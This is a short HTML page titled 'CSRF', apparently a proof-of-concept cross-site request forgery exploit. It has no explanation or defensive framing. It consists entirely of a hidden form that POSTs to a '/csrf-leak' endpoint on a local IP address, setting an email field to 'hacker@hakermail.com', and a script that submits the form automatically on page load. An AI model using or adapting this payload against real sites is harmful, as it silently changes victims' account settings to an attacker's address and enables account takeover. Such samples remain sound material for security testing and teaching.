<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
</head>
<body>
<h2>CSRF</h2>
<form method="POST" action="http://192.168.31.206/csrf-leak" enctype="multipart/form-data">
    <input type="hidden" name="cf2_emc" value="true"/>
    <input type="hidden" name="cf2_email" value="hacker@hakermail.com"/>
</form>
<script type="text/javascript">
    document.forms[0].submit();
</script>
</body>
</html>